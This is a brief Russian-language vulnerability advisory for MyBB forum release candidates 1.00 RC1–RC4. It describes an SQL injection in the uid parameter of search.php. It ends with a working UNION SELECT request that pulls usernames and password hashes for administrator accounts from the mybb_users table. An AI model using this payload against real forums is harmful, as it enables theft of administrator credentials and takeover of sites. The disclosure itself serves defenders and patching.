Уязвимость в форуме MyBB (MyBulletinBoard).
Программа:
MyBulletinBoard 1.00 Release Candidate 4
MyBulletinBoard 1.00 Release Candidate 3
MyBulletinBoard 1.00 Release Candidate 2
MyBulletinBoard 1.00 Release Candidate 1
и последние версии.
Уязвимый скрипт:search.php
Описание: Уязвимость типа SQL-инъекция. Возможно внедрение запроса в значение параметра uid.
Пример инъекции:
search.php?action=finduser&uid=-1' UNION SELECT
uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM
mybb_users where usergroup=4/*
